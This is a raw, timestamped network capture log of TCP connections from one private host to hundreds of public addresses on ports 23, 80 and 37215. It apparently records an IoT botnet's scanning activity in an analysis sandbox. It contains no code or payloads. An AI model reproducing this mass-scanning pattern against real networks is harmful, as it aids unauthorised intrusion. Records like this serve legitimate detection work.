                            Jun 10, 2024 15:37:59.683128119 CEST3364423192.168.2.13130.32.142.3
                            Jun 10, 2024 15:37:59.684225082 CEST3841437215192.168.2.13156.167.122.41
                            Jun 10, 2024 15:37:59.684447050 CEST372153399041.196.189.226192.168.2.13
                            Jun 10, 2024 15:37:59.684508085 CEST3399037215192.168.2.1341.196.189.226
                            Jun 10, 2024 15:37:59.684907913 CEST8048068189.244.26.215192.168.2.13
                            Jun 10, 2024 15:37:59.684941053 CEST4806880192.168.2.13189.244.26.215
                            Jun 10, 2024 15:37:59.685450077 CEST3506680192.168.2.1374.221.113.140
                            Jun 10, 2024 15:37:59.685484886 CEST2335570197.107.167.28192.168.2.13
                            Jun 10, 2024 15:37:59.685543060 CEST3557023192.168.2.13197.107.167.28
                            Jun 10, 2024 15:37:59.685955048 CEST4213023192.168.2.1393.133.135.212
                            Jun 10, 2024 15:37:59.686404943 CEST3935437215192.168.2.1341.113.11.68
                            Jun 10, 2024 15:37:59.686624050 CEST372153629441.12.156.197192.168.2.13
                            Jun 10, 2024 15:37:59.686661959 CEST3629437215192.168.2.1341.12.156.197
                            Jun 10, 2024 15:37:59.687701941 CEST8051382160.158.220.221192.168.2.13
                            Jun 10, 2024 15:37:59.687751055 CEST5138280192.168.2.13160.158.220.221
                            Jun 10, 2024 15:37:59.688016891 CEST2333644130.32.142.3192.168.2.13
                            Jun 10, 2024 15:37:59.688061953 CEST3364423192.168.2.13130.32.142.3
                            Jun 10, 2024 15:37:59.688134909 CEST5346280192.168.2.13220.219.206.99
                            Jun 10, 2024 15:37:59.688633919 CEST4552623192.168.2.13194.114.95.197
                            Jun 10, 2024 15:37:59.688960075 CEST5105037215192.168.2.1341.41.95.201
                            Jun 10, 2024 15:37:59.689095974 CEST3721538414156.167.122.41192.168.2.13
                            Jun 10, 2024 15:37:59.689130068 CEST3841437215192.168.2.13156.167.122.41
                            Jun 10, 2024 15:37:59.690340996 CEST803506674.221.113.140192.168.2.13
                            Jun 10, 2024 15:37:59.690382957 CEST3506680192.168.2.1374.221.113.140
                            Jun 10, 2024 15:37:59.690820932 CEST234213093.133.135.212192.168.2.13
                            Jun 10, 2024 15:37:59.690860033 CEST5149280192.168.2.13154.68.192.29
                            Jun 10, 2024 15:37:59.690864086 CEST4213023192.168.2.1393.133.135.212
                            Jun 10, 2024 15:37:59.691243887 CEST4416437215192.168.2.1341.26.2.2
                            Jun 10, 2024 15:37:59.691256046 CEST372153935441.113.11.68192.168.2.13
                            Jun 10, 2024 15:37:59.691298008 CEST3935437215192.168.2.1341.113.11.68
                            Jun 10, 2024 15:37:59.691375971 CEST5479423192.168.2.13116.57.103.152
                            Jun 10, 2024 15:37:59.692981005 CEST8053462220.219.206.99192.168.2.13
                            Jun 10, 2024 15:37:59.693037033 CEST5346280192.168.2.13220.219.206.99
                            Jun 10, 2024 15:37:59.693487883 CEST2345526194.114.95.197192.168.2.13
                            Jun 10, 2024 15:37:59.693546057 CEST4552623192.168.2.13194.114.95.197
                            Jun 10, 2024 15:37:59.693691015 CEST4000480192.168.2.13184.225.110.223
                            Jun 10, 2024 15:37:59.693901062 CEST372155105041.41.95.201192.168.2.13
                            Jun 10, 2024 15:37:59.693958998 CEST5105037215192.168.2.1341.41.95.201
                            Jun 10, 2024 15:37:59.693979979 CEST4727237215192.168.2.1341.201.89.180
                            Jun 10, 2024 15:37:59.694242954 CEST3939823192.168.2.1371.255.88.187
                            Jun 10, 2024 15:37:59.695772886 CEST8051492154.68.192.29192.168.2.13
                            Jun 10, 2024 15:37:59.695817947 CEST5149280192.168.2.13154.68.192.29
                            Jun 10, 2024 15:37:59.696181059 CEST372154416441.26.2.2192.168.2.13
                            Jun 10, 2024 15:37:59.696182966 CEST5603437215192.168.2.1341.66.186.65
                            Jun 10, 2024 15:37:59.696227074 CEST4416437215192.168.2.1341.26.2.2
                            Jun 10, 2024 15:37:59.696249962 CEST2354794116.57.103.152192.168.2.13
                            Jun 10, 2024 15:37:59.696290016 CEST5479423192.168.2.13116.57.103.152
                            Jun 10, 2024 15:37:59.696599960 CEST3421680192.168.2.1339.251.150.235
                            Jun 10, 2024 15:37:59.697102070 CEST4517423192.168.2.13143.24.152.47
                            Jun 10, 2024 15:37:59.698571920 CEST8040004184.225.110.223192.168.2.13
                            Jun 10, 2024 15:37:59.698609114 CEST4000480192.168.2.13184.225.110.223
                            Jun 10, 2024 15:37:59.698892117 CEST4256437215192.168.2.13197.27.200.127
                            Jun 10, 2024 15:37:59.699023008 CEST372154727241.201.89.180192.168.2.13
                            Jun 10, 2024 15:37:59.699074030 CEST4727237215192.168.2.1341.201.89.180
                            Jun 10, 2024 15:37:59.699146032 CEST233939871.255.88.187192.168.2.13
                            Jun 10, 2024 15:37:59.699186087 CEST3939823192.168.2.1371.255.88.187
                            Jun 10, 2024 15:37:59.699410915 CEST3390080192.168.2.1337.242.196.25
                            Jun 10, 2024 15:37:59.699934959 CEST5900623192.168.2.13130.63.23.172
                            Jun 10, 2024 15:37:59.701076031 CEST372155603441.66.186.65192.168.2.13
                            Jun 10, 2024 15:37:59.701126099 CEST5603437215192.168.2.1341.66.186.65
                            Jun 10, 2024 15:37:59.701206923 CEST5611437215192.168.2.13156.237.170.76
                            Jun 10, 2024 15:37:59.701517105 CEST803421639.251.150.235192.168.2.13
                            Jun 10, 2024 15:37:59.701564074 CEST3421680192.168.2.1339.251.150.235
                            Jun 10, 2024 15:37:59.702019930 CEST2345174143.24.152.47192.168.2.13
                            Jun 10, 2024 15:37:59.702059984 CEST4517423192.168.2.13143.24.152.47
                            Jun 10, 2024 15:37:59.702405930 CEST4927680192.168.2.13219.24.143.221
                            Jun 10, 2024 15:37:59.702940941 CEST5911423192.168.2.1340.158.200.103
                            Jun 10, 2024 15:37:59.703738928 CEST3721542564197.27.200.127192.168.2.13
                            Jun 10, 2024 15:37:59.703778028 CEST4256437215192.168.2.13197.27.200.127
                            Jun 10, 2024 15:37:59.704045057 CEST5813837215192.168.2.13156.59.177.15
                            Jun 10, 2024 15:37:59.704282999 CEST803390037.242.196.25192.168.2.13
                            Jun 10, 2024 15:37:59.704323053 CEST3390080192.168.2.1337.242.196.25
                            Jun 10, 2024 15:37:59.704793930 CEST2359006130.63.23.172192.168.2.13
                            Jun 10, 2024 15:37:59.704837084 CEST5900623192.168.2.13130.63.23.172
                            Jun 10, 2024 15:37:59.705399990 CEST6092680192.168.2.1320.163.218.116
                            Jun 10, 2024 15:37:59.705965996 CEST4179023192.168.2.13145.110.175.175
                            Jun 10, 2024 15:37:59.706058979 CEST3721556114156.237.170.76192.168.2.13
                            Jun 10, 2024 15:37:59.706100941 CEST5611437215192.168.2.13156.237.170.76
                            Jun 10, 2024 15:37:59.706479073 CEST4678837215192.168.2.13197.91.250.61
                            Jun 10, 2024 15:37:59.707292080 CEST8049276219.24.143.221192.168.2.13
                            Jun 10, 2024 15:37:59.707343102 CEST4927680192.168.2.13219.24.143.221
                            Jun 10, 2024 15:37:59.707823038 CEST235911440.158.200.103192.168.2.13
                            Jun 10, 2024 15:37:59.707859993 CEST5911423192.168.2.1340.158.200.103
                            Jun 10, 2024 15:37:59.708368063 CEST5852280192.168.2.1392.126.239.180
                            Jun 10, 2024 15:37:59.708776951 CEST4422223192.168.2.13177.57.136.238
                            Jun 10, 2024 15:37:59.708903074 CEST3721558138156.59.177.15192.168.2.13
                            Jun 10, 2024 15:37:59.708945990 CEST5813837215192.168.2.13156.59.177.15
                            Jun 10, 2024 15:37:59.709177017 CEST5437037215192.168.2.13156.201.14.29
                            Jun 10, 2024 15:37:59.710268021 CEST806092620.163.218.116192.168.2.13
                            Jun 10, 2024 15:37:59.710318089 CEST6092680192.168.2.1320.163.218.116
                            Jun 10, 2024 15:37:59.710850954 CEST2341790145.110.175.175192.168.2.13
                            Jun 10, 2024 15:37:59.710901976 CEST4179023192.168.2.13145.110.175.175
                            Jun 10, 2024 15:37:59.711400032 CEST4962080192.168.2.13161.106.196.70
                            Jun 10, 2024 15:37:59.711405039 CEST3721546788197.91.250.61192.168.2.13
                            Jun 10, 2024 15:37:59.711452007 CEST4678837215192.168.2.13197.91.250.61
                            Jun 10, 2024 15:37:59.711806059 CEST4832837215192.168.2.1341.15.193.245
                            Jun 10, 2024 15:37:59.711946964 CEST5997223192.168.2.139.123.70.97
                            Jun 10, 2024 15:37:59.713259935 CEST805852292.126.239.180192.168.2.13
                            Jun 10, 2024 15:37:59.713316917 CEST5852280192.168.2.1392.126.239.180
                            Jun 10, 2024 15:37:59.713627100 CEST2344222177.57.136.238192.168.2.13
                            Jun 10, 2024 15:37:59.713670969 CEST4422223192.168.2.13177.57.136.238
                            Jun 10, 2024 15:37:59.714042902 CEST3721554370156.201.14.29192.168.2.13
                            Jun 10, 2024 15:37:59.714085102 CEST5437037215192.168.2.13156.201.14.29
                            Jun 10, 2024 15:37:59.714452982 CEST4599480192.168.2.13120.127.248.215
                            Jun 10, 2024 15:37:59.714742899 CEST4178837215192.168.2.13197.234.232.228
                            Jun 10, 2024 15:37:59.715039968 CEST3420423192.168.2.13103.49.44.0
                            Jun 10, 2024 15:37:59.716305971 CEST8049620161.106.196.70192.168.2.13
                            Jun 10, 2024 15:37:59.716527939 CEST4962080192.168.2.13161.106.196.70
                            Jun 10, 2024 15:37:59.716701031 CEST372154832841.15.193.245192.168.2.13
                            Jun 10, 2024 15:37:59.716758013 CEST4832837215192.168.2.1341.15.193.245
                            Jun 10, 2024 15:37:59.716799974 CEST23599729.123.70.97192.168.2.13
                            Jun 10, 2024 15:37:59.716842890 CEST5997223192.168.2.139.123.70.97
                            Jun 10, 2024 15:37:59.717140913 CEST3660237215192.168.2.13197.230.194.3
                            Jun 10, 2024 15:37:59.717581987 CEST4902280192.168.2.1380.246.211.214
                            Jun 10, 2024 15:37:59.718141079 CEST3430223192.168.2.13141.254.243.59
                            Jun 10, 2024 15:37:59.719329119 CEST8045994120.127.248.215192.168.2.13
                            Jun 10, 2024 15:37:59.719372988 CEST4599480192.168.2.13120.127.248.215
                            Jun 10, 2024 15:37:59.719587088 CEST3721541788197.234.232.228192.168.2.13
                            Jun 10, 2024 15:37:59.719635963 CEST4178837215192.168.2.13197.234.232.228
                            Jun 10, 2024 15:37:59.719887018 CEST2334204103.49.44.0192.168.2.13
                            Jun 10, 2024 15:37:59.719923973 CEST3420423192.168.2.13103.49.44.0
                            Jun 10, 2024 15:37:59.720099926 CEST5816037215192.168.2.13197.119.156.133
                            Jun 10, 2024 15:37:59.720228910 CEST4356080192.168.2.1324.223.44.225
                            Jun 10, 2024 15:37:59.722009897 CEST4569237215192.168.2.13156.27.221.22
                            Jun 10, 2024 15:37:59.722069979 CEST3721536602197.230.194.3192.168.2.13
                            Jun 10, 2024 15:37:59.722111940 CEST3660237215192.168.2.13197.230.194.3
                            Jun 10, 2024 15:37:59.722292900 CEST3441080192.168.2.13178.116.76.220
                            Jun 10, 2024 15:37:59.722486019 CEST804902280.246.211.214192.168.2.13
                            Jun 10, 2024 15:37:59.722532988 CEST4902280192.168.2.1380.246.211.214
                            Jun 10, 2024 15:37:59.723062992 CEST2334302141.254.243.59192.168.2.13
                            Jun 10, 2024 15:37:59.723119020 CEST3430223192.168.2.13141.254.243.59
                            Jun 10, 2024 15:37:59.723921061 CEST4903437215192.168.2.13197.216.238.129
                            Jun 10, 2024 15:37:59.724040031 CEST5640080192.168.2.1376.87.100.69
                            Jun 10, 2024 15:37:59.724937916 CEST3721558160197.119.156.133192.168.2.13
                            Jun 10, 2024 15:37:59.724987984 CEST5816037215192.168.2.13197.119.156.133
                            Jun 10, 2024 15:37:59.725100040 CEST804356024.223.44.225192.168.2.13
                            Jun 10, 2024 15:37:59.725133896 CEST4356080192.168.2.1324.223.44.225
                            Jun 10, 2024 15:37:59.725785971 CEST6004637215192.168.2.1341.174.115.39
                            Jun 10, 2024 15:37:59.725903988 CEST4359080192.168.2.13200.227.24.116
                            Jun 10, 2024 15:37:59.726948977 CEST3721545692156.27.221.22192.168.2.13
                            Jun 10, 2024 15:37:59.726999998 CEST4569237215192.168.2.13156.27.221.22
                            Jun 10, 2024 15:37:59.727153063 CEST8034410178.116.76.220192.168.2.13
                            Jun 10, 2024 15:37:59.727199078 CEST3441080192.168.2.13178.116.76.220
                            Jun 10, 2024 15:37:59.727632046 CEST4725837215192.168.2.1341.170.34.101
                            Jun 10, 2024 15:37:59.727757931 CEST4323280192.168.2.1380.234.35.77
                            Jun 10, 2024 15:37:59.728812933 CEST3721549034197.216.238.129192.168.2.13
                            Jun 10, 2024 15:37:59.728862047 CEST4903437215192.168.2.13197.216.238.129
                            Jun 10, 2024 15:37:59.728935003 CEST805640076.87.100.69192.168.2.13
                            Jun 10, 2024 15:37:59.728977919 CEST5640080192.168.2.1376.87.100.69
                            Jun 10, 2024 15:37:59.729562998 CEST4154837215192.168.2.13197.33.14.33
                            Jun 10, 2024 15:37:59.729825974 CEST3710880192.168.2.1386.248.77.229
                            Jun 10, 2024 15:37:59.730668068 CEST372156004641.174.115.39192.168.2.13
                            Jun 10, 2024 15:37:59.730711937 CEST6004637215192.168.2.1341.174.115.39
                            Jun 10, 2024 15:37:59.730782032 CEST8043590200.227.24.116192.168.2.13
                            Jun 10, 2024 15:37:59.730830908 CEST4359080192.168.2.13200.227.24.116
                            Jun 10, 2024 15:37:59.731465101 CEST5635037215192.168.2.13156.211.89.221
                            Jun 10, 2024 15:37:59.731597900 CEST5201880192.168.2.1320.192.68.43
                            Jun 10, 2024 15:37:59.732522011 CEST372154725841.170.34.101192.168.2.13
                            Jun 10, 2024 15:37:59.732568026 CEST4725837215192.168.2.1341.170.34.101
                            Jun 10, 2024 15:37:59.732604027 CEST804323280.234.35.77192.168.2.13
                            Jun 10, 2024 15:37:59.732649088 CEST4323280192.168.2.1380.234.35.77
                            Jun 10, 2024 15:37:59.733416080 CEST3708423192.168.2.13178.112.24.109
                            Jun 10, 2024 15:37:59.733808994 CEST6038837215192.168.2.13197.149.113.57
                            Jun 10, 2024 15:37:59.734332085 CEST4941280192.168.2.1364.204.248.79
                            Jun 10, 2024 15:37:59.734476089 CEST3721541548197.33.14.33192.168.2.13
                            Jun 10, 2024 15:37:59.734524965 CEST4154837215192.168.2.13197.33.14.33
                            Jun 10, 2024 15:37:59.734720945 CEST803710886.248.77.229192.168.2.13
                            Jun 10, 2024 15:37:59.734761953 CEST3710880192.168.2.1386.248.77.229
                            Jun 10, 2024 15:37:59.735941887 CEST5681423192.168.2.13161.223.29.209
                            Jun 10, 2024 15:37:59.736329079 CEST3721556350156.211.89.221192.168.2.13
                            Jun 10, 2024 15:37:59.736363888 CEST5635037215192.168.2.13156.211.89.221
                            Jun 10, 2024 15:37:59.736423016 CEST805201820.192.68.43192.168.2.13
                            Jun 10, 2024 15:37:59.736476898 CEST5201880192.168.2.1320.192.68.43
                            Jun 10, 2024 15:37:59.736623049 CEST4204680192.168.2.13195.209.166.102
                            Jun 10, 2024 15:37:59.737873077 CEST5687023192.168.2.1385.191.23.41
                            Jun 10, 2024 15:37:59.738270998 CEST2337084178.112.24.109192.168.2.13
                            Jun 10, 2024 15:37:59.738312006 CEST3708423192.168.2.13178.112.24.109
                            Jun 10, 2024 15:37:59.738524914 CEST5677880192.168.2.13124.198.230.56
                            Jun 10, 2024 15:37:59.738683939 CEST3721560388197.149.113.57192.168.2.13
                            Jun 10, 2024 15:37:59.738746881 CEST6038837215192.168.2.13197.149.113.57
                            Jun 10, 2024 15:37:59.739211082 CEST804941264.204.248.79192.168.2.13
                            Jun 10, 2024 15:37:59.739253998 CEST4941280192.168.2.1364.204.248.79
                            Jun 10, 2024 15:37:59.739737034 CEST4803623192.168.2.13183.72.192.189
                            Jun 10, 2024 15:37:59.740541935 CEST3903480192.168.2.13152.83.224.204
                            Jun 10, 2024 15:37:59.740873098 CEST2356814161.223.29.209192.168.2.13
                            Jun 10, 2024 15:37:59.740915060 CEST5681423192.168.2.13161.223.29.209
                            Jun 10, 2024 15:37:59.741519928 CEST8042046195.209.166.102192.168.2.13
                            Jun 10, 2024 15:37:59.741566896 CEST4204680192.168.2.13195.209.166.102
                            Jun 10, 2024 15:37:59.741589069 CEST3691223192.168.2.1348.238.160.167
                            Jun 10, 2024 15:37:59.742225885 CEST5273680192.168.2.1396.171.224.255
                            Jun 10, 2024 15:37:59.742753029 CEST235687085.191.23.41192.168.2.13
                            Jun 10, 2024 15:37:59.742804050 CEST5687023192.168.2.1385.191.23.41
                            Jun 10, 2024 15:37:59.743396997 CEST8056778124.198.230.56192.168.2.13
                            Jun 10, 2024 15:37:59.743411064 CEST5172823192.168.2.13126.154.176.146
                            Jun 10, 2024 15:37:59.743438005 CEST5677880192.168.2.13124.198.230.56
                            Jun 10, 2024 15:37:59.744065046 CEST5782480192.168.2.13135.106.4.49
                            Jun 10, 2024 15:37:59.744599104 CEST2348036183.72.192.189192.168.2.13
                            Jun 10, 2024 15:37:59.744642973 CEST4803623192.168.2.13183.72.192.189
                            Jun 10, 2024 15:37:59.745290995 CEST3353423192.168.2.13117.118.248.143
                            Jun 10, 2024 15:37:59.745543957 CEST8039034152.83.224.204192.168.2.13
                            Jun 10, 2024 15:37:59.745599985 CEST3903480192.168.2.13152.83.224.204
                            Jun 10, 2024 15:37:59.745868921 CEST3786280192.168.2.13203.54.242.166
                            Jun 10, 2024 15:37:59.745943069 CEST3786280192.168.2.13203.54.242.166
                            Jun 10, 2024 15:37:59.746216059 CEST3732623192.168.2.13187.195.80.142
                            Jun 10, 2024 15:37:59.746474981 CEST233691248.238.160.167192.168.2.13
                            Jun 10, 2024 15:37:59.746519089 CEST3691223192.168.2.1348.238.160.167
                            Jun 10, 2024 15:37:59.746861935 CEST3821680192.168.2.13203.54.242.166
                            Jun 10, 2024 15:37:59.747107029 CEST805273696.171.224.255192.168.2.13
                            Jun 10, 2024 15:37:59.747149944 CEST5273680192.168.2.1396.171.224.255
                            Jun 10, 2024 15:37:59.747936964 CEST3282480192.168.2.1370.109.71.255
                            Jun 10, 2024 15:37:59.747936964 CEST3282480192.168.2.1370.109.71.255
                            Jun 10, 2024 15:37:59.748065948 CEST4643423192.168.2.1376.165.180.163
                            Jun 10, 2024 15:37:59.748347998 CEST2351728126.154.176.146192.168.2.13
                            Jun 10, 2024 15:37:59.748398066 CEST5172823192.168.2.13126.154.176.146
                            Jun 10, 2024 15:37:59.748970032 CEST8057824135.106.4.49192.168.2.13
                            Jun 10, 2024 15:37:59.749018908 CEST5782480192.168.2.13135.106.4.49
                            Jun 10, 2024 15:37:59.749176979 CEST4474037215192.168.2.1341.38.164.93
                            Jun 10, 2024 15:37:59.749310970 CEST3317880192.168.2.1370.109.71.255
                            Jun 10, 2024 15:37:59.750194073 CEST2333534117.118.248.143192.168.2.13
                            Jun 10, 2024 15:37:59.750233889 CEST3353423192.168.2.13117.118.248.143
                            Jun 10, 2024 15:37:59.750503063 CEST4519223192.168.2.13217.177.129.226
                            Jun 10, 2024 15:37:59.750794888 CEST8037862203.54.242.166192.168.2.13
                            Jun 10, 2024 15:37:59.750932932 CEST3567480192.168.2.13151.218.172.48
                            Jun 10, 2024 15:37:59.750932932 CEST3567480192.168.2.13151.218.172.48
                            Jun 10, 2024 15:37:59.751116037 CEST2337326187.195.80.142192.168.2.13
                            Jun 10, 2024 15:37:59.751171112 CEST3732623192.168.2.13187.195.80.142
                            Jun 10, 2024 15:37:59.751801968 CEST8038216203.54.242.166192.168.2.13
                            Jun 10, 2024 15:37:59.751842976 CEST3821680192.168.2.13203.54.242.166
                            Jun 10, 2024 15:37:59.752156019 CEST3653037215192.168.2.13156.231.3.185
                            Jun 10, 2024 15:37:59.752279043 CEST3602880192.168.2.13151.218.172.48
                            Jun 10, 2024 15:37:59.752818108 CEST803282470.109.71.255192.168.2.13
                            Jun 10, 2024 15:37:59.752968073 CEST234643476.165.180.163192.168.2.13
                            Jun 10, 2024 15:37:59.753015041 CEST4643423192.168.2.1376.165.180.163
                            Jun 10, 2024 15:37:59.753312111 CEST5884423192.168.2.1313.140.175.29
                            Jun 10, 2024 15:37:59.753726006 CEST5864880192.168.2.1350.13.193.163
                            Jun 10, 2024 15:37:59.753741980 CEST5864880192.168.2.1350.13.193.163
                            Jun 10, 2024 15:37:59.754029989 CEST372154474041.38.164.93192.168.2.13
                            Jun 10, 2024 15:37:59.754075050 CEST4474037215192.168.2.1341.38.164.93
                            Jun 10, 2024 15:37:59.754163980 CEST803317870.109.71.255192.168.2.13
                            Jun 10, 2024 15:37:59.754220963 CEST3317880192.168.2.1370.109.71.255
                            Jun 10, 2024 15:37:59.754673004 CEST3493237215192.168.2.13197.9.107.34
                            Jun 10, 2024 15:37:59.754760981 CEST5900280192.168.2.1350.13.193.163
                            Jun 10, 2024 15:37:59.755059004 CEST5041823192.168.2.1369.167.90.241
                            Jun 10, 2024 15:37:59.755419016 CEST2345192217.177.129.226192.168.2.13
                            Jun 10, 2024 15:37:59.755465031 CEST4519223192.168.2.13217.177.129.226
                            Jun 10, 2024 15:37:59.755806923 CEST8035674151.218.172.48192.168.2.13
                            Jun 10, 2024 15:37:59.756000996 CEST5343480192.168.2.1370.156.171.43
                            Jun 10, 2024 15:37:59.756021023 CEST5343480192.168.2.1370.156.171.43
                            Jun 10, 2024 15:37:59.756918907 CEST6087837215192.168.2.1341.140.184.247
                            Jun 10, 2024 15:37:59.757006884 CEST3721536530156.231.3.185192.168.2.13
                            Jun 10, 2024 15:37:59.757013083 CEST5378880192.168.2.1370.156.171.43
                            Jun 10, 2024 15:37:59.757057905 CEST3653037215192.168.2.13156.231.3.185
                            Jun 10, 2024 15:37:59.757108927 CEST8036028151.218.172.48192.168.2.13
                            Jun 10, 2024 15:37:59.757121086 CEST4060823192.168.2.1381.151.185.7
                            Jun 10, 2024 15:37:59.757153988 CEST3602880192.168.2.13151.218.172.48
                            Jun 10, 2024 15:37:59.758224964 CEST235884413.140.175.29192.168.2.13
                            Jun 10, 2024 15:37:59.758232117 CEST4343480192.168.2.1357.244.132.164
                            Jun 10, 2024 15:37:59.758241892 CEST4343480192.168.2.1357.244.132.164
                            Jun 10, 2024 15:37:59.758261919 CEST5884423192.168.2.1313.140.175.29
                            Jun 10, 2024 15:37:59.758624077 CEST805864850.13.193.163192.168.2.13
                            Jun 10, 2024 15:37:59.759071112 CEST4583423192.168.2.1351.148.234.23
                            Jun 10, 2024 15:37:59.759193897 CEST6025637215192.168.2.1341.204.133.93
                            Jun 10, 2024 15:37:59.759296894 CEST4379080192.168.2.1357.244.132.164
                            Jun 10, 2024 15:37:59.759565115 CEST3721534932197.9.107.34192.168.2.13
                            Jun 10, 2024 15:37:59.759612083 CEST3493237215192.168.2.13197.9.107.34
                            Jun 10, 2024 15:37:59.759655952 CEST805900250.13.193.163192.168.2.13
                            Jun 10, 2024 15:37:59.759702921 CEST5900280192.168.2.1350.13.193.163
                            Jun 10, 2024 15:37:59.759947062 CEST235041869.167.90.241192.168.2.13
                            Jun 10, 2024 15:37:59.759985924 CEST5041823192.168.2.1369.167.90.241
                            Jun 10, 2024 15:37:59.760581017 CEST3587280192.168.2.13194.55.24.22
                            Jun 10, 2024 15:37:59.760597944 CEST3587280192.168.2.13194.55.24.22
                            Jun 10, 2024 15:37:59.760869026 CEST805343470.156.171.43192.168.2.13
                            Jun 10, 2024 15:37:59.761327982 CEST3970823192.168.2.1368.155.180.148
                            Jun 10, 2024 15:37:59.761564016 CEST4515637215192.168.2.13197.37.79.4
                            Jun 10, 2024 15:37:59.761652946 CEST3622680192.168.2.13194.55.24.22
                            Jun 10, 2024 15:37:59.761838913 CEST372156087841.140.184.247192.168.2.13
                            Jun 10, 2024 15:37:59.761868000 CEST805378870.156.171.43192.168.2.13
                            Jun 10, 2024 15:37:59.761882067 CEST6087837215192.168.2.1341.140.184.247
                            Jun 10, 2024 15:37:59.761913061 CEST5378880192.168.2.1370.156.171.43
                            Jun 10, 2024 15:37:59.762033939 CEST234060881.151.185.7192.168.2.13
                            Jun 10, 2024 15:37:59.762075901 CEST4060823192.168.2.1381.151.185.7
                            Jun 10, 2024 15:37:59.762944937 CEST5013480192.168.2.13102.230.19.253
                            Jun 10, 2024 15:37:59.762959003 CEST5013480192.168.2.13102.230.19.253
                            Jun 10, 2024 15:37:59.763139963 CEST4375623192.168.2.13175.241.195.149
                            Jun 10, 2024 15:37:59.763154030 CEST804343457.244.132.164192.168.2.13
                            Jun 10, 2024 15:37:59.763881922 CEST3536237215192.168.2.1341.117.93.142
                            Jun 10, 2024 15:37:59.763942003 CEST234583451.148.234.23192.168.2.13
                            Jun 10, 2024 15:37:59.763966084 CEST5048880192.168.2.13102.230.19.253
                            Jun 10, 2024 15:37:59.763981104 CEST4583423192.168.2.1351.148.234.23
                            Jun 10, 2024 15:37:59.764039040 CEST372156025641.204.133.93192.168.2.13
                            Jun 10, 2024 15:37:59.764085054 CEST6025637215192.168.2.1341.204.133.93
                            Jun 10, 2024 15:37:59.764137983 CEST804379057.244.132.164192.168.2.13
                            Jun 10, 2024 15:37:59.764180899 CEST4379080192.168.2.1357.244.132.164
                            Jun 10, 2024 15:37:59.765228987 CEST4595680192.168.2.1320.2.48.78
                            Jun 10, 2024 15:37:59.765245914 CEST4595680192.168.2.1320.2.48.78
                            Jun 10, 2024 15:37:59.765343904 CEST5435623192.168.2.13137.246.157.211
                            Jun 10, 2024 15:37:59.765424013 CEST8035872194.55.24.22192.168.2.13
                            Jun 10, 2024 15:37:59.766170025 CEST3542037215192.168.2.13197.64.121.194
                            Jun 10, 2024 15:37:59.766242981 CEST233970868.155.180.148192.168.2.13
                            Jun 10, 2024 15:37:59.766252041 CEST4631080192.168.2.1320.2.48.78
                            Jun 10, 2024 15:37:59.766285896 CEST3970823192.168.2.1368.155.180.148
                            Jun 10, 2024 15:37:59.766500950 CEST3721545156197.37.79.4192.168.2.13
                            Jun 10, 2024 15:37:59.766530037 CEST8036226194.55.24.22192.168.2.13
                            Jun 10, 2024 15:37:59.766547918 CEST4515637215192.168.2.13197.37.79.4
                            Jun 10, 2024 15:37:59.766572952 CEST3622680192.168.2.13194.55.24.22
                            Jun 10, 2024 15:37:59.767194986 CEST4648023192.168.2.13101.140.61.30
                            Jun 10, 2024 15:37:59.767523050 CEST6012680192.168.2.1388.157.63.21
                            Jun 10, 2024 15:37:59.767523050 CEST6012680192.168.2.1388.157.63.21
                            Jun 10, 2024 15:37:59.767829895 CEST8050134102.230.19.253192.168.2.13
                            Jun 10, 2024 15:37:59.768033028 CEST2343756175.241.195.149192.168.2.13
                            Jun 10, 2024 15:37:59.768075943 CEST4375623192.168.2.13175.241.195.149
                            Jun 10, 2024 15:37:59.768487930 CEST4112037215192.168.2.1341.186.239.153
                            Jun 10, 2024 15:37:59.768589020 CEST6048080192.168.2.1388.157.63.21
                            Jun 10, 2024 15:37:59.768820047 CEST372153536241.117.93.142192.168.2.13
                            Jun 10, 2024 15:37:59.768872023 CEST3536237215192.168.2.1341.117.93.142
                            Jun 10, 2024 15:37:59.768872023 CEST8050488102.230.19.253192.168.2.13
                            Jun 10, 2024 15:37:59.768918037 CEST5048880192.168.2.13102.230.19.253
                            Jun 10, 2024 15:37:59.769413948 CEST4082423192.168.2.13210.61.135.33
                            Jun 10, 2024 15:37:59.769857883 CEST3933880192.168.2.13193.5.227.125
                            Jun 10, 2024 15:37:59.769857883 CEST3933880192.168.2.13193.5.227.125
                            Jun 10, 2024 15:37:59.770112038 CEST804595620.2.48.78192.168.2.13
                            Jun 10, 2024 15:37:59.770298958 CEST2354356137.246.157.211192.168.2.13
                            Jun 10, 2024 15:37:59.770344019 CEST5435623192.168.2.13137.246.157.211
                            Jun 10, 2024 15:37:59.770808935 CEST6062037215192.168.2.1341.144.136.243
                            Jun 10, 2024 15:37:59.770906925 CEST3969280192.168.2.13193.5.227.125
                            Jun 10, 2024 15:37:59.771131992 CEST3721535420197.64.121.194192.168.2.13
                            Jun 10, 2024 15:37:59.771183014 CEST804631020.2.48.78192.168.2.13
                            Jun 10, 2024 15:37:59.771187067 CEST3542037215192.168.2.13197.64.121.194
                            Jun 10, 2024 15:37:59.771230936 CEST4631080192.168.2.1320.2.48.78
                            Jun 10, 2024 15:37:59.771230936 CEST5580823192.168.2.1366.78.100.75
                            Jun 10, 2024 15:37:59.772099972 CEST2346480101.140.61.30192.168.2.13
                            Jun 10, 2024 15:37:59.772141933 CEST4648023192.168.2.13101.140.61.30
                            Jun 10, 2024 15:37:59.772200108 CEST4915680192.168.2.13181.171.108.67
                            Jun 10, 2024 15:37:59.772200108 CEST4915680192.168.2.13181.171.108.67
                            Jun 10, 2024 15:37:59.772519112 CEST806012688.157.63.21192.168.2.13
                            Jun 10, 2024 15:37:59.773158073 CEST4404837215192.168.2.13197.255.246.136
                            Jun 10, 2024 15:37:59.773267031 CEST4951080192.168.2.13181.171.108.67
                            Jun 10, 2024 15:37:59.773471117 CEST5157023192.168.2.1363.172.158.231
                            Jun 10, 2024 15:37:59.773488998 CEST372154112041.186.239.153192.168.2.13
                            Jun 10, 2024 15:37:59.773529053 CEST4112037215192.168.2.1341.186.239.153
                            Jun 10, 2024 15:37:59.773539066 CEST806048088.157.63.21192.168.2.13
                            Jun 10, 2024 15:37:59.773580074 CEST6048080192.168.2.1388.157.63.21
                            Jun 10, 2024 15:37:59.774279118 CEST2340824210.61.135.33192.168.2.13
                            Jun 10, 2024 15:37:59.774333954 CEST4082423192.168.2.13210.61.135.33
                            Jun 10, 2024 15:37:59.774509907 CEST5412880192.168.2.13115.56.153.54
                            Jun 10, 2024 15:37:59.774524927 CEST5412880192.168.2.13115.56.153.54
                            Jun 10, 2024 15:37:59.774749994 CEST8039338193.5.227.125192.168.2.13
